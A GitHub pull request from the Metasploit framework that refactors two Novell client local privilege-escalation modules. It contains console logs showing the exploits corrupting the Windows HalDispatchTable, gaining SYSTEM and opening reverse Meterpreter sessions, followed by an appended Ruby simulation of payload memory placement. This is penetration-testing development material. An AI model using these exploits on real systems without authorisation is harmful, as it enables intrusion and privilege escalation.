
[SeeRM:#8136] & [SeeRM:#8137] - Use execute_shellcode in novell modules #2071

Merged
merged 2 commits into from Jul 5, 2013

Conversation

@wchen-r7 (Contributor) commented Jul 3, 2013

Use execute_shellcode() found in Msf::Post::Windows::Process instead of having their own. Please: It's best to give Juan time to review this.

jvazquez-r7 pushed a commit that referenced this pull request Jul 5, 2013
@jvazquez-r7 jvazquez-r7 merged commit 226f4dd into rapid7:master Jul 5, 2013
@jvazquez-r7 (Contributor) commented

Works, thanks @wchen-r7 for taking care. Just added a last fix to avoid putting the final userland payload on a fixed address: ad94f43

Working after changes:

msf exploit(novell_client_nwfs) > set session 1
session => 1
msf exploit(novell_client_nwfs) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.0.4:4444 
[*] Detecting the target system...
[*] "Windows XP (Build 2600, Service Pack 3)."
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\nwfs found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x3
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Injecting 290 bytes to memory and executing it...
[*] Sending stage (751104 bytes) to 192.168.0.4
[+] Enjoy

[*] Meterpreter session 3 opened (192.168.0.4:4444 -> 192.168.0.4:59622) at 2013-07-05 10:12:58 -0500

meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.4 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(novell_client_nwfs) > use exploit/multi/handler 
msf exploit(handler) > sessions -K
[*] Killing all sessions...
[*] 192.168.172.245 - Meterpreter session 1 closed.
msf exploit(handler) > jobs -K
Stopping all jobs...
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.196
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.196:49168) at 2013-07-05 10:18:39 -0500

meterpreter > background
[*] Backgrounding session 4...
msf exploit(handler) > use exploit/windows/local/novell_client_nicm 
msf exploit(novell_client_nicm) > set session 4
session => 4
msf exploit(novell_client_nicm) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.0.4:4444 
[*] Detecting the target system...
[*] Running against Windows 7 SP1
[*] Checking device...
[+] \\.\nicm found!
[*] Storing the Kernel stager on memory...
[*] Triggering the vulnerability to execute the Kernel Handler
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Injecting 290 bytes to memory and executing it...
[*] Sending stage (751104 bytes) to 192.168.0.4
[+] Enjoy
[*] Meterpreter session 5 opened (192.168.0.4:4444 -> 192.168.0.4:60102) at 2013-07-05 10:18:56 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.196 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(novell_client_nicm) > 
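Added example (not code from this PR or from the Metasploit framework): the follow-up fix above stops the modules from passing a fixed address for the final userland payload. The stand-alone Ruby below models the two placement policies a helper like execute_shellcode() can follow, a caller-chosen fixed base versus an allocator-chosen first-fit gap, over a constructed process memory map. The map, the region names and the helper names (allocate_fixed, allocate_anywhere, place_shellcode) are all assumptions made for illustration; the real helper delegates allocation to the target process through Meterpreter and this file only simulates that decision.

```ruby
# Added example: a stand-alone model of the two allocation policies a
# helper such as execute_shellcode() can follow when placing a userland
# payload in a target process. This is NOT Metasploit or Meterpreter
# code; the real helper delegates allocation to the target process and
# the memory map below is constructed for illustration only.

PAGE = 0x1000

# Constructed sample memory map of a 32-bit target process. Addresses and
# sizes are hypothetical; the last entry stands for a mapping left behind
# by an earlier run of the exploit at a hard-coded address.
SAMPLE_MAP = [
  { name: 'image',         start: 0x00400000, size: 0x5000 },
  { name: 'heap',          start: 0x00140000, size: 0x10000 },
  { name: 'ntdll.dll',     start: 0x7c900000, size: 0xb0000 },
  { name: 'PEB/TEB',       start: 0x7ffd0000, size: 0x30000 },
  { name: 'stale_payload', start: 0x00010000, size: PAGE },
].freeze

def align_up(addr, a = PAGE)
  (addr + a - 1) & ~(a - 1)
end

def overlap?(start, size, region)
  start < region[:start] + region[:size] && region[:start] < start + size
end

# Fixed-base policy: the caller names the address and the request fails
# if any existing mapping already covers part of that range.
def allocate_fixed(map, base, size)
  return nil unless base % PAGE == 0
  size = align_up(size)
  map.any? { |r| overlap?(base, size, r) } ? nil : base
end

# Allocator-chosen policy: first page-aligned gap that fits, searched
# between the lowest allocatable user address (Windows reserves the
# first 64 KiB) and the top of the 32-bit user range.
def allocate_anywhere(map, size, lo = 0x10000, hi = 0x7fff0000)
  size = align_up(size)
  cursor = lo
  map.sort_by { |r| r[:start] }.each do |r|
    return cursor if cursor + size <= r[:start]
    cursor = [cursor, align_up(r[:start] + r[:size])].max
  end
  cursor + size <= hi ? cursor : nil
end

# Shape of a helper with an optional base address: with no base the
# allocator decides, with a base the caller is betting the range is free.
# Records the new mapping so a second call sees it. Returns the address
# the payload was placed at, or nil when placement failed.
def place_shellcode(map, shellcode, base = nil)
  size = shellcode.bytesize
  addr = base ? allocate_fixed(map, base, size) : allocate_anywhere(map, size)
  return nil unless addr
  map << { name: 'payload', start: addr, size: align_up(size) }
  addr
end

if $PROGRAM_NAME == __FILE__
  payload = "\x90" * 290 # constructed stand-in for the 290-byte payload in the log
  puts format('fixed 0x10000 : %s', place_shellcode(SAMPLE_MAP.dup, payload, 0x10000).inspect)
  puts format('allocator     : 0x%08x', place_shellcode(SAMPLE_MAP.dup, payload))
end
```

With the constructed map, the fixed request at 0x10000 fails because that page is already mapped, while the allocator-chosen path lands in the first free page and a second call lands in the next one. That is the practical reason to let the target's allocator choose: a hard-coded base only works while the module can guarantee nothing else occupies it, which a repeated or partially failed run can break.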
